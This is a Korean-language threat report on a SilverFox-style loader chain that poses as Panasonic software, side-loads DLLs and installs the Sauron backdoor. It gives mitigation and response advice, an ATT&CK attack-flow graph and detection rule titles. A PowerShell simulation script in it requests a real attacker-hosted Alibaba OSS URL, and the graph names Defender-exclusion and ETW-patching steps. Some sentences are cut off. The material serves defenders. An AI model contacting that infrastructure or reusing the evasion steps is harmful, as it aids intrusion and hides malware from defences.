팔로우 
요약
이 위협은 합법적인 파나소닉 소프트웨어로 위장한 고도로 정교한 다단계 로더 체인을 중심으로 합니다. 맬웨어는 Alibaba OSS를 사용하여 페이로드를 전달하고, 독특한 5바이트 EOF 트레일러 포맷을 사용하는 이미지 기반 암호화 운반자를 활용합니다. 최종 단계에서는 서비스 생성과 특정 레지스트리 변경을 통해 지속성을 유지하는 Sauron 백도어를 배포합니다.
조사
분석가들은 정적 및 동적 분석을 모두 수행하여 Tencent 및 Philips 소프트웨어로 브랜드화된 바이너리를 포함한 사이드 로딩 작업의 연속을 밝혀냈습니다. 조사는 증가하는 XOR 및 RC4를 사용한 계층적 암호 해독 루틴을 드러내고, RPC 메커니즘을 통해 예약된 작업 생성도 확인했습니다. 메모리 포렌식과 샌드박스 텔레메트리는 초기 파나소닉 테마의 래퍼부터 최종 Sauron 백도어까지 실행 경로를 재구성하는 데 도움을 주었습니다.
완화
조직은 허가받지 않은 RPC 기반 작업 예약과 의심스러운 예약된 작업 생성을 주시해야 합니다 NdrClientCall3. 강력한 애플리케이션 허용 목록은 승인되지 않은 사이드 로딩 DLL의 실행을 차단하는 데 도움이 될 수 있습니다. 수비수는 또한 볼륨 섀도우 복사본의 예기치 않은 삭제 및 HKCUSOFTWARE.
응답
이 활동이 감지되면 추가적인 수평적 이동이나 명령 제어 통신을 차단하기 위해 영향받은 시스템을 즉시 격리하십시오. 로더 체인의 현재 단계를 결정하고 주입된 모듈을 식별하기 위해 메모리 포렌식을 수행하십시오. 네트워크 로그도 Alibaba OSS 인프라 및 분류 중 확인된 명령 제어 IP 주소로의 트래픽에 대해 검토해야 합니다.
graph TB %% Class Definitions classDef action fill:#99ccff classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef evasion fill:#ccffcc classDef persistence fill:#ffff99 %% Node Definitions %% Initial Access and Execution exec_user_malicious[“<b>Action</b> – <b id=’T1204.002’>User Execution: Malicious File</b><br/><b>File</b>: ainstaller-86533005.exe<br/><b>Description</b>: User executes trojanized executable<br/>disguised as Panasonic PC Notification software.”] class exec_user_malicious action %% Obfuscation and Masquerading obf_files[“<b id=’T1027’>Obfuscated Files or Information</b><br/><b>Technique</b>: Multi-layer staged buffers<br/><b>Mechanism</b>: Custom XOR/RC4 decoding<br/><b>Extraction</b>: Five-byte EOF trailer from image carriers.”] class obf_files malware mask_file_type[“<b id=’T1036.008’>Masquerading: Masquerade File Type</b><br/><b>Description</b>: Using image extensions (gif, jpg, png, db)<br/>to hide encrypted payloads.”] class mask_file_type evasion %% Proxy Execution proxy_sys_bin[“<b id=’T1218’>System Binary Proxy Execution</b><br/><b>Target 1</b>: Tencent UxEnhanceHost loading UxEnhance64.dll<br/><b>Target 2</b>: Philips/Speech Processing Solutions host loading XPSPLOG.dll”] class proxy_sys_bin action %% Persistence persist_sched_task[“<b id=’T1053.005’>Scheduled Task/Job: Scheduled Task</b><br/><b>Module</b>: VirtuOne<br/><b>Mechanism</b>: RPC calls to Task Scheduler via \pipeatsvc<br/><b>Goal</b>: Create hidden repeating tasks.”] class persist_sched_task persistence %% Defense Evasion evade_def_impair[“<b id=’T1685’>Defense Impairment</b><br/><b>Action</b>: Patching ntdll.dll!NtTraceEvent”] class evade_def_impair evasion evade_selective_excl[“<b id=’T1679’>Selective Exclusion</b><br/><b>Tool</b>: PowerShell<br/><b>Command</b>: Add-MpPreference -ExclusionPath<br/><b>Goal</b>: Add Windows Defender exclusions.”] class evade_selective_excl evasion %% Final Stage proxy_rundll32[“<b id=’T1218.011’>System Binary Proxy Execution: Rundll32</b><br/><b>File</b>: rundll32.dat<br/><b>Export</b>: Edge<br/><b>Action</b>: Installs and starts malicious service.”] class proxy_rundll32 action malware_sauron[“<b id=’Malware’>Malware: Sauron</b><br/><b>Type</b>: Malicious Service<br/><b>Capability</b>: Persistent backdoor and command-launching.”] class malware_sauron malware %% Connections %% Flow of execution exec_user_malicious –>|triggers| obf_files obf_files –>|utilizes| mask_file_type mask_file_type –>|leads_to| proxy_sys_bin proxy_sys_bin –>|enables| persist_sched_task persist_sched_task –>|facilitates| evade_def_impair persist_sched_task –>|facilitates| evade_selective_excl evade_def_impair –>|prepares environment for| proxy_rundll32 evade_selective_excl –>|prepares environment for| proxy_rundll32 proxy_rundll32 –>|installs| malware_sauron
공격 흐름
탐지
비정상 경로에서의 시스템 프로세스 실행 (프로세스 생성 통해)
보기
공용 사용자 프로필에서의 의심스러운 실행 (프로세스 생성 통해)
보기
의심스러운 VSSADMIN 활동 (커맨드 라인 통해)
보기
Windows Defender 설정의 의심스러운 변경 (파워셸 통해)
보기
공용 사용자 프로필 내 의심스러운 파일 (파일 이벤트 통해)
보기
SilverFox 스타일 로더 체인 네트워크 지표 감지 [Windows 네트워크 연결]
보기
SilverFox 스타일 로더 체인을 이용한 파나소닉 실행 파일 트로이화 사용 감지 [Windows 프로세스 생성]
보기
시뮬레이션 실행
전제조건: Telemetry & Baseline 프리플라이트 검사가 통과해야 합니다.
이유: 이 섹션은 탐지 규칙을 촉발시키기 위해 설계된 적대적 기술(TTP)의 정확한 실행을 설명합니다. 명령과 서사는 식별된 TTP를 직접 반영하고 탐지 논리에 기대되는 정확한 텔레메트리를 생성해야 합니다. 추상적이거나 관련 없는 예제는 오진으로 이어질 수 있습니다.
-
공격 서사 및 명령: 적수는 합법적인 클라우드 저장소 서비스를 이용하여 두 번째 단계의 페이로드를 다운로드하려고 하여 정상 트래픽과 혼합되려고 시도합니다. 공격자는 기존 SilverFox Alibaba OSS URL에 요청을 보내는 로더를 시뮬레이트하기 위해 PowerShell 원라이너를 사용합니다:
https://jun616.oss-cn-beijing.aliyuncs.com/tad/payload.exe. 이 행동은aliyuncs.com의 평판을 활용하여 간단한 도메인 필터를 우회하기 위한 것입니다. -
회귀 테스트 스크립트:
# SilverFox 로더 네트워크 지표의 시뮬레이션 # 이 스크립트는 Sigma 규칙이 모니터하는 특정 URL에 연결을 시도합니다. $targetUrl = "https://jun616.oss-cn-beijing.aliyuncs.com/tad/test_file.txt" Write-Host "[!] $targetUrl 로의 SilverFox 네트워크 연결을 시뮬레이션 중" try { # 표준 HTTP 프록시 텔레메트리를 생성하기 위해 Invoke-WebRequest 사용 $response = Invoke-WebRequest -Uri $targetUrl -Method Get -UseBasicParsing Write-Host "[+] 요청 완료. 상태 코드: $($response.StatusCode)" } catch { # URL이 실제로 파일을 호스팅하지 않을 경우 404 또는 연결 오류를 예상하지만, # 프록시 로그는 여전히 시도를 기록할 것입니다. Write-Host "[-] 요청 시도. 연결 시도에 대한 것이라면 프록시 로그를 확인하십시오." } -
정리 명령:
# 이 시뮬레이션으로 인한 지속적인 변경 사항 없음; 정리 불필요. Write-Host "[*] 시뮬레이션 정리 완료."